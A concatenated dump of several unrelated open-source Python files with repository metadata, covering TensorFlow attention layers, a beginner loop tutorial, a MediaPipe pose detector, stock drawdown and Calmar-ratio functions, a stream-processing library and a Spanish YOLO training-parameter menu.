redirect_field_name = '/'
def get_queryset(self):
return UserProfile.objects.all()
| [
"pristowel@gmail.com"
] | pristowel@gmail.com |
dc4cd84593aa25971075c2cfbd4507bf03bd428e | b8249860b2d4c41d39cab4106fc15aedbbf7b0e8 | /components/layers.py | 6137637bb2aaa7775b50087431e9d7afd9faaba9 | [
"MIT"
] | permissive | serre-lab/visreasoning | b5ef3c5af8ac9cfeef016411e917e97a154d0712 | b84bfbb7d5c2290356f717a966f815f68be7c3c4 | refs/heads/master | 2021-09-10T11:00:31.136282 | 2018-03-25T02:43:40 | 2018-03-25T02:43:40 | 125,939,508 | 2 | 2 | null | null | null | null | UTF-8 | Python | false | false | 3,754 | py | import tensorflow as tf
import numpy as np
from components import component
from operator import mul
# NOTE: input_size and output_size exclude batch dimension but the actual input and output must have batch dimension as its first dim.
class BaseLayer(component.UniversalComponent):
"""
Contains variables and operations common to all layers. Sets attributes, checks for inconsistencies, builds variable list.
"""
def __init__(self, name, input_size, batch_size=1, trainable=True):
"""
Inputs:
name : (str) layer name
input_size : (list) dimensions of layer input [height, width, channels]
batch_size : (int) batch size
trainable : (bool) If true, layer weights can be updated duirng learning.
"""
self.name = name # must be a string
self.input_size = input_size # must be a list (height-width-inchannels)
self.output_size = None
self.batch_size = batch_size # must be an int
self.output = None
self.trainable = trainable
if not isinstance(self.name, str):
raise TypeError("BaseLayer: name should be string.")
if not isinstance(self.input_size, list):
raise TypeError("BaseLayer: input_size should be a list of ints.")
elif not len(self.input_size) == 3:
raise ValueError("BaseLayer: input_size should be shaped like height-width-inchannels.")
else:
for idim in range(len(self.input_size)):
if not isinstance(self.input_size[idim], int):
raise TypeError("BaseLayer: input_size should be a list of ints.")
if not (isinstance(self.batch_size, int) and self.batch_size > 0):
raise TypeError("BaseLayer: batch_size should be a positive int.")
def run(self, X):
"""
Checks to see if current input is properly shaped.
Inputs :
X : (tensor) an input tensor of size [batch_size] + self.input_size
"""
if '1.0' in tf.__version__:
if not X.shape.as_list()[1:] == self.input_size:
raise TypeError("BaseLayer: input (X) has different shape (excluding batch) than input_size.")
def get_variables(self):
"""
Builds variable list
"""
var_list = []
if hasattr(self, 'weights'):
var_list = var_list + [self.weights]
if hasattr(self, 'biases'):
var_list = var_list + [self.biases]
return var_list
class AttentionLayer(BaseLayer):
"""
Abstract attentional layer. Super-object for spatial and feature attention layers. Sets mask size and output size.
"""
def initialize_vars(self):
"""
Sets output size and mask.
"""
self.output_size = self.input_size
self.mask = tf.ones([self.batch_size] + self.input_size, dtype=tf.float32) / reduce(mul, self.input_size)
def run(self, X):
"""
Checks input size and multiplies mask with input.
Inputs :
X : (tensor) input tensor of size [batch_size] + self.input_size
"""
super(AttentionLayer, self).run(X)
output = tf.multiply(X, self.mask, name=self.name + '_out')
if '1.0' in tf.__version__:
if not output.shape.as_list()[1:] == self.output_size:
raise TypeError(
"AttentionLayer: output (Y) has different shape (excluding batch) than input_size. Could be a bug in implementation.")
return output
def set_batch_size(self, batch_size):
"""
Sets batch size.
Inputs :
batch_size : (int) batch_size
"""
super(AttentionLayer, self).set_batch_size(batch_size)
self.initialize_vars()
| [
"junkyungkim@Snowboard.fios-router.home"
] | junkyungkim@Snowboard.fios-router.home |
e5563aa8e1c6380c3100808977ba86c702e04ada | afe1810e565dbf7832a1f9b58f314a485f5df82a | /Flow control.py | edf8ef117b54eb1fc8112e55c8a7c367aae604f1 | [] | no_license | sriramv95/Python-Programming | e601ddfbaf4cddd6abc0bdcfa71336fcf1acbabb | 96da7e57ad134c8bb9519f5fc4304b860178d728 | refs/heads/master | 2022-11-18T20:06:18.610644 | 2020-07-15T03:56:15 | 2020-07-15T03:56:15 | 279,757,340 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,184 | py | # -*- coding: utf-8 -*-
"""
Created on Wed Jan 29 08:55:04 2020
@author: Sriram
"""
# =============================================================================
# Flow control statement
# =============================================================================
# if
# while
# for
# while statement is used to execute set of statements while conditions is true
# syntax
# while (condition):
# python statements1
# else:
# python statements2
# other statements
time = 9
while(time < 12):
print("Good Morning")
time+= 1
else:
print("Good Afternoon")
#write python function to find the number of times i
def times(num):
count = 0
while(num <= 100):
count+=1
num+= 10
return count;
times(50)
# for loop is used to define given set of statements for one time for each value
# in the collection
# for i in the collection:
# python statemnts
for i in [9,10,11,12]:
print (i)
print("Good morning")
# write python functin to find the value after adding 10 to the user give value 5 times
def num(x,tim = 5):
count = tim
for i in range(count):
x+= 10
return x;
num(50)
num(50,6)
# how to decide which loop we have to use given problem
# Case1 : write python to find the value if I have to save 52/- per week - for loop
def SAV(x):
count = 0
for i in range(x, 0, -52):
count+= 1
else:
print("Number of weeks:",count - 1)
SAV(10000000)
# OR
def SAVA(x):
week = x // 52
weeks = int(week)
print("Number of weeks:",weeks)
SAVA(1000)
# case 2 : write python function to find the total number of weeks it will take to make
# 5000
def SAV2(x):
count = 0
while x < 5000:
x = x + 52
count+= 1
else:
print("Number of weeks:",count - 1)
print("Final x value:",x - 52)
SAV2(0)
# OR
def SAVA(x):
week = x // 52
weeks = int(week)
print("Number of weeks:",weeks)
SAVA(5000)
# Flow control statements
# Break
# Continue
# Pass | [
"noreply@github.com"
] | sriramv95.noreply@github.com |
ba7ee657e0649c6c2ae706947a88abeaa7aa9ff2 | 11544ca256de12c14b437715ec275788d59b359f | /poseModule.py | fd43fcb614ee4b68df507218c4e6d0660a1b5c41 | [
"MIT"
] | permissive | watcharabulsak/FastDOC_Prudential_Project | f3420de385465eeaf9971fd0b98a3745e20594ec | e5b5e164d6a7029cabf3b2e5827d18d255b8aa45 | refs/heads/main | 2023-05-08T01:23:56.546485 | 2021-05-30T09:12:36 | 2021-05-30T09:12:36 | 372,151,617 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,192 | py | import cv2
import mediapipe as mp
import time
import math
import numpy as np
class poseDetector():
def __init__(self, mode = False, upBody =False, smooth = True, detectionCon= 0.5, trackCon = 0.5):
self.mode = mode
self.upBody = upBody
self.smooth = smooth
self.detectionCon = detectionCon
self.trackCon = trackCon
self.mpDraw = mp.solutions.drawing_utils
self.mpPose = mp.solutions.pose
self.pose = self.mpPose.Pose(self.mode, self.upBody, self.smooth, self.detectionCon, self.trackCon)
def findPose(self, img, draw = True):
imgRGB = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
self.results = self.pose.process(imgRGB)
if self.results.pose_landmarks:
if draw:
self.mpDraw.draw_landmarks(img, self.results.pose_landmarks, self.mpPose.POSE_CONNECTIONS)
return (img)
def findPosition(self, img, draw = True):
self.lmList = []
if self.results.pose_landmarks:
for id, lm in enumerate(self.results.pose_landmarks.landmark):
h, w, c = img.shape
# print(id, lm)
cx, cy = int(lm.x*w), int(lm.y*h)
self.lmList.append([id, cx, cy])
if draw:
cv2.circle(img, (cx, cy), 5, (255, 0, 0), cv2.FILLED)
return(self.lmList)
def findAngle(self, img, p1, p2, p3, draw = True):
#Get the landmarks
x1, y1 = self.lmList[p1][1:]
x2, y2 = self.lmList[p2][1:]
x3, y3 = self.lmList[p3][1:]
# Calculate the Angle
angle = math.degrees(math.atan2(y3 - y2, x3 -x2) - math.atan2(y1-y2 , x1 -x2))
if angle < 0:
angle += 0
angle1 = angle
if angle > 299:
angle += -260
angle1 = angle
# print(angle)
#Draw
if draw:
cv2.line(img, (x1, y1), (x2, y2), (255,255,255), 3)
cv2.line(img, (x3, y3), (x2, y2), (255,255,255), 3)
cv2.circle(img, (x1, y1), 10, (255, 0, 0), cv2.FILLED)
cv2.circle(img, (x1, y1), 15, (255, 0, 0), 2)
cv2.circle(img, (x2, y2), 10, (255, 0, 0), cv2.FILLED)
cv2.circle(img, (x2, y2), 15, (255, 0, 0), 2)
cv2.circle(img, (x3, y3), 10, (255, 0, 0), cv2.FILLED)
cv2.circle(img, (x3, y3), 15, (255, 0, 0), 2)
cv2.putText(img, str(int(angle)), (x2 - 20, y2 +50), cv2.FONT_HERSHEY_PLAIN, 2.5, (0, 0, 255), 2 )
return angle
def main():
cap = cv2.VideoCapture('../Pose_Estimate/1.mp4')
pTime = 0
detector = poseDetector()
while True:
success, img = cap.read()
img = detector.findPose(img)
lmList = detector.findPosition(img)
# print(lmList)
cTime = time.time()
fps = 1/(cTime - pTime)
pTime = cTime
cv2.putText(img, str(int(fps)), (70 ,50), cv2.FONT_HERSHEY_SIMPLEX, 1, (255,0,0),3)
cv2.imshow("Image", img)
cv2.waitKey(10)
if __name__ == "__main__":
main() | [
"noreply@github.com"
] | watcharabulsak.noreply@github.com |
bfb478f20e11de16e5810f8d08fa62eb3da131f8 | f48a3d354bf4bbbe3d47651dd77853c29934f1fe | /Code/Finance/Code/Udemy_AlgoTrading/51_max_dd_calmar.py | 0639e3adacef6a05456f219fb7c4fdc80ad8f7fa | [
"MIT"
] | permissive | guidefreitas/TeachingDataScience | 0677df459d5a13c00404b8b04cbe3b389dae3d8b | f3e0bc6e391348a8065b09855ab82c436f82a4b5 | refs/heads/master | 2023-09-03T14:02:11.853103 | 2021-11-07T03:56:54 | 2021-11-07T03:56:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,457 | py | # =============================================================================
# Measuring the performance of a buy and hold strategy - Max drawdown & calmar ratio
# Author : Mayank Rasu (http://rasuquant.com/wp/)
# Please report bug/issues in the Q&A section
# =============================================================================
# Import necesary libraries
import yfinance as yf
import numpy as np
import datetime as dt
# Download historical data for required stocks
ticker = "^GSPC"
SnP = yf.download(ticker,dt.date.today()-dt.timedelta(1825),dt.datetime.today())
def CAGR(DF):
"function to calculate the Cumulative Annual Growth Rate of a trading strategy"
df = DF.copy()
df["daily_ret"] = DF["Adj Close"].pct_change()
df["cum_return"] = (1 + df["daily_ret"]).cumprod()
n = len(df)/252
CAGR = (df["cum_return"][-1])**(1/n) - 1
return CAGR
def max_dd(DF):
"function to calculate max drawdown"
df = DF.copy()
df["daily_ret"] = DF["Adj Close"].pct_change()
df["cum_return"] = (1 + df["daily_ret"]).cumprod()
df["cum_roll_max"] = df["cum_return"].cummax()
df["drawdown"] = df["cum_roll_max"] - df["cum_return"]
df["drawdown_pct"] = df["drawdown"]/df["cum_roll_max"]
max_dd = df["drawdown_pct"].max()
return max_dd
print(max_dd(SnP))
def calmar(DF):
"function to calculate calmar ratio"
df = DF.copy()
clmr = CAGR(df)/max_dd(df)
return clmr
print(calmar(SnP))
| [
"yogeshkulkarni@yahoo.com"
] | yogeshkulkarni@yahoo.com |
6c27f3d07face576d697b2fba1c8919de5ac65a9 | 691d3080caa8eb6bc1012fc2843e6d190b61d10a | /data/stream.py | 9fae470abafeb34e339aab6e625bd7c73bc9427d | [] | no_license | grahamas/generative_motion | 82b78c0348255e2576ead0ab789583c93aaff15f | a490b4da24106eb356168fc05070bd482117ebb1 | refs/heads/master | 2021-03-22T03:45:33.950777 | 2016-06-02T02:48:00 | 2016-06-02T02:48:00 | 51,705,870 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,225 | py | import os,sys
sys.path.insert(1, os.path.join(sys.path[0], '..'))
from future_builtins import zip
from abc import ABCMeta, abstractmethod
import random
from util.circ_array import CircularArray
import numpy as np
# Less than a week after writing this (well, I finished today)
# I have the sneaking feeling that generator expressions have the
# same effect.
class Stream(object):
"""
Streams data
Does not hold data; IS NOT ITERATOR.
Does iterate.
"""
def __init__(self, source, max_len=None,
skip_len=0, on_load=[]):
"""
source : stream's source (typically another stream)
max_len : (default=None) maximum number of stream units to load
skip_len : (default=0) the number of initial units to skip
on_load : (default=[]) list of processing functions to apply to
each unit when loaded
"""
self.source = source
self.max_len = max_len
self.skip_len = skip_len
self.on_load = on_load
self.skip_n(self.skip_len)
self.i_unit = 0
def write(self, file_name, mode, on_write=[]):
with open(file_name, mode) as out_file:
unit = self.next()
while unit is not None:
out_file.write(reduce(lambda x,f: f(x), on_write, unit))
unit = self.next()
def next(self):
"""
Returns next unit.
"""
if (not self.max_len) or self.i_unit < self.max_len:
try:
self.i_unit += 1 # Probably bad idea, since StopIteration could be sent,
# but i_unit would continue incrementing.
return reduce(lambda x,f: f(x) if x is not None else None, self.on_load, self.source.next())
except StopIteration:
return None
else:
return None
def skip(self):
if isinstance(self.source, Stream):
self.source.skip()
else:
self.source.next()
def batch(self, batch_size, stride=None, max_len=None,
skip_len=0, on_load=[]):
"""
Returns stream whose units are batches.
"""
return BatchStream(self, batch_size, stride=stride,
max_len=max_len, skip_len=skip_len, on_load=on_load)
def map(self, functions, arr=None, stride=None,
max_len=None, skip_len=0):
"""
Returns stream whose units are map output.
"""
if isinstance(functions, list):
return Stream(self, max_len=max_len,
skip_len=skip_len, on_load=functions)
else:
return Stream(self, max_len=max_len,
skip_len=skip_len, on_load=[functions])
def reduce(self, function, init_value=None):
"""
Returns output of reduction.
"""
if init_value:
left = init_value
else:
left = self.next()
right = self.next()
while right is not None:
left = function(left, right)
right = self.next()
return left
def next_n(self, n):
return [self.next() for i in range(n)]
def skip_n(self,n):
"""
Skips ahead n units, sending logic down the line.
"""
if isinstance(self.source, Stream):
self.source.skip_n(n)
else:
for i in range(n):
self.source.next()
def to_list(self):
ret_list = []
next_unit = self.next()
while next_unit is not None:
ret_list += [next_unit]
next_unit = self.next()
return ret_list
class StreamCollection(object):
"""
A collection of streams. We assume we start with the sources.
"""
def __init__(self, stream_collection, on_load=[]):
self.stream_collection = stream_collection
def __len__(self):
return len(self.stream_collection)
def next(self):
return [reduce(lambda x,f: f(x), self.on_load, stream) for stream in self.stream_collection.next()]
def skip(self):
self.stream_collection.skip()
def next_n(self, n):
"""
Gets list of lists of next n from each stream,
and applies on_load functions to each unit.
Necessary implmentation for batching.
"""
return [[reduce(lambda x,f: f(x), self.on_load, unit) for unit in stream_n_units]
for stream_n_units in self.stream_collection.next()]
def skip_n(self):
self.stream_collection.skip_n()
def batch(self, batch_size, stride=None, max_len=None,
skip_len=0, on_load=[]):
return
def map(self, functions, stride=None,
max_len=None, skip_len=0):
"""
Maps functions to all streams independently.
Works by returning a new StreamCollection with the
functions as the on_load in the new Collection,
and self as the source_collection of the returned
object.
Returns new StreamCollection.
"""
if isinstance(functions, list):
return StreamCollection(self, max_len=max_len,
skip_len=skip_len, on_load=functions)
else:
return StreamCollection(self, max_len=max_len,
skip_len=skip_len, on_load=[functions])
def reduce(self, function, init_values=None):
"""
Independently reduces all streams (folding from left, obviously).
Returns list of results.
"""
if init_values:
if isinstance(init_values, list):
lefts = init_values
else:
lefts = [init_values] * len(self.stream_collection)
else:
lefts = self.next()
rights = self.next()
while not all(rights is None):
valid = not rights is None
args = zip(lefts[valid], rights[valid])
lefts = map(lambda arg: function(*arg), args)
rights = self.next()
def join(self, function, max_len=None,
skip_len=0):
"""
Joins all streams in the collection into a single stream.
Takes a function that takes a list of units and returns
a unit (no necessary relation between in and out units).
Returns new Stream.
"""
return Stream(self, on_load=[function])
class BatchStream(Stream):
def __init__(self, source, batch_size,
stride=None,
max_len=None,
skip_len=0, on_load=[]):
# Notice that super call MUST follow self.next assignment,
# in case skip function is called. (??? No that's wrong)
if stride and not stride == batch_size:
assert stride < batch_size and stride > 0
self.stride = stride
self.next = self.uninitialized_next
else:
self.next = self.simple_next
super(BatchStream, self).__init__(source, max_len, skip_len, on_load)
self.batch_size = batch_size
def uninitialized_next(self):
"""
Initializes the on_hand buffer, and returns the first batch.
"""
self.circ_array = CircularArray(self.source.next_n(self.batch_size))
self.next = self.initialized_next
return self.apply(self.circ_array.get())
def initialized_next(self):
"""
Now that the buffer has been initialized, just gets next
stride's worth of units from source. Uses effectively circular
array for storage.
"""
self.circ_array.append(self.source.next_n(self.stride))
return self.apply(self.circ_array.get())
def simple_next(self):
"""
In the case that the batches don't overlap.
"""
return self.apply(self.source.next_n(self.batch_size))
def apply(self, retval):
"""
A helper function to apply on_load and check for None value.
Possibly unnecessary, but eliminates code repetition.
"""
if retval is None:
return None
retval = reduce(lambda x, f: f(x), self.on_load, retval)
if not any(val is None for val in retval):
return retval
else:
return None
class BatchStreamCollection(StreamCollection):
def __init__(self, stream_collection, batch_size,
stride=None,
max_len=None,
skip_len=0, on_load=[]):
if stride and not stride == batch_size:
assert stride < batch_size and stride > 0
self.stride = stride
self.next = self.uninitialized_next
else:
self.next = self.simple
super(BatchStreamCollection, self).__init__(stream_collection, max_len, skip_len, on_load)
self.batch_size = batch_size
def uninitialized_next(self):
self.l_circ_array = [CircularArray(source.next_n(self.batch_size)) for source in self.stream_collection]
self.next = self.initialized_next
return [reduce(lambda x,f: f(x), self.on_load, ca.get()) for ca in self.l_circ_array]
def initialized_next(self):
(ca.append(source.next_n(self.stride)) for ca,source in zip(self.l_circ_array,self.stream_collection))
return [reduce(lambda x,f: f(x), self.on_load, ca.get()) for ca in self.l_circ_array]
def simple_next(self):
return [reduce(lambda x,f: f(x), self.on_load, source.next_n(batch_size)) for source in self.stream_collection]
class FileStream(Stream):
"""
Abstract class for implementing base stream from a file
Needs to be abstract as the method of file opening is different.
In implementing, subclass FileSource in a class defined in the __enter__
method. This subclass should define all the low level methods of interacting
with the file. Then the __enter__ method returns an instance of the FileSource
subclass, and the __exit__ method cleans up.
"""
__metaclass__ = ABCMeta
def __init__(self, file_path, max_len=None,
skip_len=0, on_load=[]):
"""
file_path : path to data file
max_len : (default=None) maximum number of stream units to load
skip_len : (default=0) the number of initial units to skip
on_load : (default=[]) list of processing functions to apply to
each unit when loaded
"""
self.file_path = file_path
super(FileStream, self).__init__(None, max_len,
skip_len, on_load)
@abstractmethod
def __enter__(self):
pass
@abstractmethod
def __exit__(self):
pass
class FileStreamCollection(StreamCollection):
"""
Collection of FileStreams
Implements "with" logic (returns list of opened sources)
"""
def __len__(self):
return len(self.sources)
def next(self):
return [reduce(lambda x,f: f(x), self.on_load, stream) for stream in self.streams]
def skip(self):
pass
# TODO
#def map(self, functions
def __enter__(self):
self.sources = [stream.__enter__() for stream in self.streams]
return self.sources
def __exit__(self):
[source.__exit__() for source in self.sources]
class FileSource(object):
"""
Abstract class for implementing lowest level interaction with file.
For safety, this class should only be instantiated within a "with"
block, so all subclass definitions should appear in the __enter__
method of a subclass of the FileStream class.
"""
__metaclass__ = ABCMeta
@abstractmethod
def next(self):
pass
def next_n(self,n):
"Naive implementation, for convenience."
return [self.next() for i in range(n)]
@abstractmethod
def skip(self):
pass
def skip_n(self,n):
"Naive implementation, for convenience."
for i in range(n):
self.skip()
@abstractmethod
def close_file(self):
pass
| [
"grahamas@gmail.com"
] | grahamas@gmail.com |
56a996d6c220db976dbe6c426c9c67b3026bf224 | 846109568e3f4d805d6d39b9adbe32032775db93 | /ayuda.py | 3168d288a182102d83ec308c8c238430c5594ffe | [] | no_license | sergiocoteronPI/carPlatesDetection | aacdc5038b782aef5d4d720eedcb6d676bc0695e | cf9378b105a4515fd3bb653b9de0bf63c8388897 | refs/heads/master | 2020-11-28T04:35:03.445684 | 2020-01-14T12:24:31 | 2020-01-14T12:24:31 | 229,704,479 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 18,801 | py |
import numpy as np
import cv2
import os
import sys
""" ===================================
Subprograma auxiliar para eliminar los
elementos que haya en una ruta dada
=================================== """
def eliminar_elementos(ruta):
    """Delete every regular file found under *ruta*, recursively.

    Directories themselves are left in place; only the files inside them
    are removed.
    """
    for directorio, _, ficheros in os.walk(ruta):
        for nombre in ficheros:
            os.remove(os.path.join(directorio, nombre))
""" =============================================================================================================================================================
Colocamos aquí la lista de parámetros que no varian a lo
largo de todo el programa y que todos los subprogramas
podran utilizar.
*** Lista ***
0 - ent_numb_max -> Numero de veces que ejecutaremos el entrenamiento a lo sumo.
1 - paso_maximo -> Es el número de pasos que un lote puede entrenar antes de ser sustituido por otro lote.
2 - perdida_minima -> Es la cantidad mínima que la función pérdida (f_p) puede tener. Si f_p < perdida_minima entonces cambiamos de lote.
3 - dim -> Es la dimensión de las imágenes con la que estamos tratando. Es difícil que este parámetro cambie.
4 - batch_size -> Tamaño que cada lote va a tener. Si tenemos una base de datos de tamaño n y batch_size = b_s entonces numero_de_lotes = [n/b_s].
5 - batch_size_test -> Tamaño del lote para el test.
6 - cada_pasito -> Variable entera que establece cada cuantos pasos (step) mostraremos el resultado de f_p, guardaremos datos y podremos optar a ver img_finales
7 - quiero_ver -> Variable de control booleana. Permite decirnos si queremos ver o no el resultado de los entrenamientos cada_pasito.
8 - learning_ratio -> Redio de aprendizaje. Es el número que regula el cambio de los pesos y sesgos de las capas convolucionales.
9 - threshold -> Nivel de precisión que ha de tener una predicción para crear una caja.
10 - labels -> Nombre de las posibles etiquetas.
11 - anchors -> Valores predeterminados para predicciones de cajas.
12 - H, W, S, C, B -> salida.shape[1], salida.shape[2], salida.shape[1 (o 2 que son iguales)], numero de clases, numero de cajas de predicción.
13 - sqrt -> Vete a saber tu para que sirve esto.
14 - n_final_layers -> Numero final de capas que ha de tener la salida.
============================================================================================================================================================= """
def prog_change_datos(ent_numb_max,paso_maximo,precision_min,dim_fil,dim_col,batch_size,batch_size_test,cada_pasito,quiero_ver,salvando,
preprocesamiento,learning_ratio,threshold,labels,anchors,H, W, C, B):
print('')
print(' ===== PROGRAMA DE ENTRENAMIENTO =====')
print(' ===== ------------------------- =====')
print('')
print(' ---> Red neuronal basada en YOLO <---')
print('')
print(' *** PARAMETROS DE LA RED NEURONAL ***')
print(' ===== ------------------------- =====')
print('')
print(' 1 - Numero maximo de entrenamientos a ejecutar ----------> ', ent_numb_max)
print(' 2 - Paso maximo -----------------------------------------> ', paso_maximo)
print(' 3 - Precision minima ------------------------------------> ', precision_min)
print('')
print(' 4 - Dimension de las imagenes ---------------------------> ', dim_fil, ' - ', dim_col)
print('')
print(' 5 - Tamaño del lote de entrenamiento --------------------> ', batch_size)
print(' 6 - Tamaño del lote de testeo ---------------------------> ', batch_size_test)
print('')
print(' 7 - Numero de pasos para mostrar perdida y guardar ------> ', cada_pasito)
print(' 8 - Guardar imagenes de salida en "imagenes_devueltas" --> ', quiero_ver)
print(' 9 - Guardar entrenamiento -------------------------------> ', salvando)
print('')
print(' 10 - Preprocesamiento -----------------------------------> ', preprocesamiento)
print(' 11 - Radio de aprendizaje -------------------------------> ', learning_ratio)
print('')
print(' =*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*==*=*=*=*=*=*=*=*=*=*=*=*=*=*=')
print('')
print(' 12 - Limite de precision aceptable ----------------------> ', threshold)
print(' 13 - Etiquetas ------------------------------------------> ', labels)
print(' 14 - Anclas (rectangulos predeterminados) ---------------> ', anchors)
print('')
print(' 15 - H, W, S, C, B, sqrt --------------------------------> ', H, W, C, B)
print('')
scarlet = input('Estos son los parametros de la red. Está de acuerdo con ellos (s/n): ')
l_p_scarlet = ['s', 'S', 'Y', 'y', 'si', 'Si', 'SI', 'sI', 'Yes', 'yes', 'YES', 'n', 'N', 'No', 'NO']
while scarlet not in l_p_scarlet:
print('')
print('Introduzca correctamente la respuesta.')
scarlet = input('Estos son los parametros de la red. Está de acuerdo con ellos (s/n): ')
if scarlet in ['n', 'N', 'No', 'NO']:
print('')
print(' ATENCION. EL CAMBIO DE VALORES DE LA RED TRAE CONSECUENCIAS QUE ALTERARAN EL RESULTADO DE LA SALIDA')
print('')
de_acuerdo = 5
while de_acuerdo not in ['s', 'S', 'Y', 'y', 'si', 'Si', 'SI', 'sI', 'Yes', 'yes', 'YES']:
johansson = input('Introduzca el nombre del parametro de la lista que desea cambiar: ')
lista_de_parametros = ['1','2','3','4','5','6','7','8','9','10','11','12','13','14', '15']
while johansson not in lista_de_parametros:
print('')
print('Introduce bien las cosas. No es tan dificil. Un numero del 1 al 15.')
johansson = input('Introduzca el nombre del parametro de la lista que desea cambiar: ')
if johansson == '1':
print('')
print('Vas a cambiar el numero de entrenamiento maximos. Su valor actual es: ', ent_numb_max)
nuevo_valor = input('Introduce un nuevo valor: ')
try:
ent_numb_max = int(nuevo_valor)
except:
print('')
print('La has cagado. Adios.')
sys.exit()
elif johansson == '2':
print('')
print('Vas a cambiar el numero de pasos maximos. Su valor actual es: ', paso_maximo)
nuevo_valor = input('Introduce un nuevo valor: ')
try:
paso_maximo = int(nuevo_valor)
except:
print('')
print('La has cagado. Adios.')
sys.exit()
elif johansson == '3':
print('')
print('Vas a cambiar la precision minima. Su valor actual es: ', precision_min)
nuevo_valor = input('Introduce un nuevo valor: ')
try:
precision_min = float(nuevo_valor)
except:
print('')
print('La has cagado. Adios.')
sys.exit()
elif johansson == '4':
print('')
print('Vas a cambiar la imension de las imagenes (NO RECOMENDADO). Su valor actual es: ', dim_fil, ' - ', dim_col)
nuevo_valor_fil = input('Introduce un nuevo valor de dim_fil: ')
nuevo_valor_col = input('Introduce un nuevo valor de dim_col: ')
try:
dim_fil, dim_col = int(nuevo_valor_fil), int(nuevo_valor_col)
except:
print('')
print('La has cagado. Adios.')
sys.exit()
elif johansson == '5':
print('')
print('Vas a cambiar el tamano del lote. Su valor actual es: ', batch_size)
nuevo_valor = input('Introduce un nuevo valor: ')
try:
batch_size = int(nuevo_valor)
except:
print('')
print('La has cagado. Adios.')
sys.exit()
elif johansson == '6':
print('')
print('Vas a cambiar el numero de elementos para testear. Su valor actual es: ', batch_size_test)
nuevo_valor = input('Introduce un nuevo valor: ')
try:
batch_size_test = int(nuevo_valor)
except:
print('')
print('La has cagado. Adios.')
sys.exit()
elif johansson == '7':
print('')
print('Vas a cambiar el numero de pasos para mostrar perdida y guardar parametro e imagenes. Su valor actual es: ', cada_pasito)
nuevo_valor = input('Introduce un nuevo valor: ')
try:
cada_pasito = int(nuevo_valor)
except:
print('')
print('La has cagado. Adios.')
sys.exit()
elif johansson == '8':
print('')
print('Vas a cambiar la opcion para ver las imagenes en carpeta. Su valor actual es: ', quiero_ver)
nuevo_valor = input('Introduce un nuevo valor: ')
try:
quiero_ver = nuevo_valor
except:
print('')
print('La has cagado. Adios.')
sys.exit()
elif johansson == '9':
print('')
print('Vas a cambiar la opcion para salvar. Su valor actual es: ', salvando)
nuevo_valor = input('Introduce un nuevo valor: ')
try:
salvando = nuevo_valor
except:
print('')
print('La has cagado. Adios.')
sys.exit()
elif johansson == '10':
print('')
print('Vas a cambiar el preprocesamiento de imagenes. Su valor actual es: ', preprocesamiento)
nuevo_valor = input('Introduce un nuevo valor: ')
try:
preprocesamiento = nuevo_valor
except:
print('')
print('La has cagado. Adios.')
sys.exit()
elif johansson == '11':
print('')
print('Vas a cambiar el radio de aprendizaje. Su valor actual es: ', learning_ratio)
nuevo_valor = input('Introduce un nuevo valor: ')
try:
learning_ratio = float(nuevo_valor)
except:
print('')
print('La has cagado. Adios.')
sys.exit()
elif johansson == '12':
print('')
print('Vas a cambiar el limite de precision. Su valor actual es: ', threshold)
nuevo_valor = input('Introduce un nuevo valor: ')
try:
threshold = float(nuevo_valor)
except:
print('')
print('La has cagado. Adios.')
sys.exit()
elif johansson == '13':
print('')
print('Vas a cambiar elas etiquetas. Su valor actual es: ', labels)
nuevo_valor = input('Introduce un nuevo valor (ej: a b c): ')
try:
labels = nuevo_valor.split(' ')
except:
print('')
print('La has cagado. Adios.')
sys.exit()
elif johansson == '14':
print('')
print('Vas a cambiar las anclas (NO RECOMENDADO). Su valor actual es: ', anchors)
nuevo_valor = input('Introduce un nuevo valor (ej: 1 2 3 4 5): ')
try:
anchors_2 = nuevo_valor.split(', ')
anchors = []
for avc in anchors_2:
anchors.append(float(avc))
except:
print('')
print('La has cagado. Adios.')
sys.exit()
elif johansson == '15':
print('')
print('Vas a cambiar alguno de los valores H, W, C, B.')
megan = input('Cual de ellos: ')
if megan in ['H', 'W', 'C', 'B']:
if megan == 'H':
print('')
try:
H = int(input('Introduce un nuevo valor: '))
except:
print('')
print('La has cagado. Adios.')
sys.exit()
if megan == 'W':
print('')
try:
W = int(input('Introduce un nuevo valor: '))
except:
print('')
print('La has cagado. Adios.')
sys.exit()
if megan == 'C':
print('')
try:
C == int(input('Introduce un nuevo valor: '))
except:
print('')
print('La has cagado. Adios.')
sys.exit()
if megan == 'B':
print('')
try:
B = int(input('Introduce un nuevo valor: '))
except:
print('')
print('La has cagado. Adios.')
sys.exit()
else:
print('')
print('La has cagado. Adios.')
sys.exit()
print('')
print(' ===== PROGRAMA DE ENTRENAMIENTO =====')
print(' ===== ------------------------- =====')
print('')
print(' ---> Red neuronal basada en YOLO <---')
print('')
print(' *** PARAMETROS DE LA RED NEURONAL ***')
print(' ===== ------------------------- =====')
print('')
print(' 1 - Numero maximo de entrenamientos a ejecutar ----------> ', ent_numb_max)
print(' 2 - Paso maximo -----------------------------------------> ', paso_maximo)
print(' 3 - Precision minima ------------------------------------> ', precision_min)
print('')
print(' 4 - Dimension de las imagenes ---------------------------> ', dim_fil, ' - ', dim_col)
print('')
print(' 5 - Tamaño del lote de entrenamiento --------------------> ', batch_size)
print(' 6 - Tamaño del lote de testeo ---------------------------> ', batch_size_test)
print('')
print(' 7 - Numero de pasos para mostrar perdida y guardar ------> ', cada_pasito)
print(' 8 - Guardar imagenes de salida en "imagenes_devueltas" --> ', quiero_ver)
print(' 9 - Guardar entrenamiento -------------------------------> ', salvando)
print('')
print(' 10 - Preprocesamiento -----------------------------------> ', preprocesamiento)
print(' 11 - Radio de aprendizaje -------------------------------> ', learning_ratio)
print('')
print(' =*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*==*=*=*=*=*=*=*=*=*=*=*=*=*=*=')
print('')
print(' 12 - Limite de precision aceptable ----------------------> ', threshold)
print(' 13 - Etiquetas ------------------------------------------> ')#, labels)
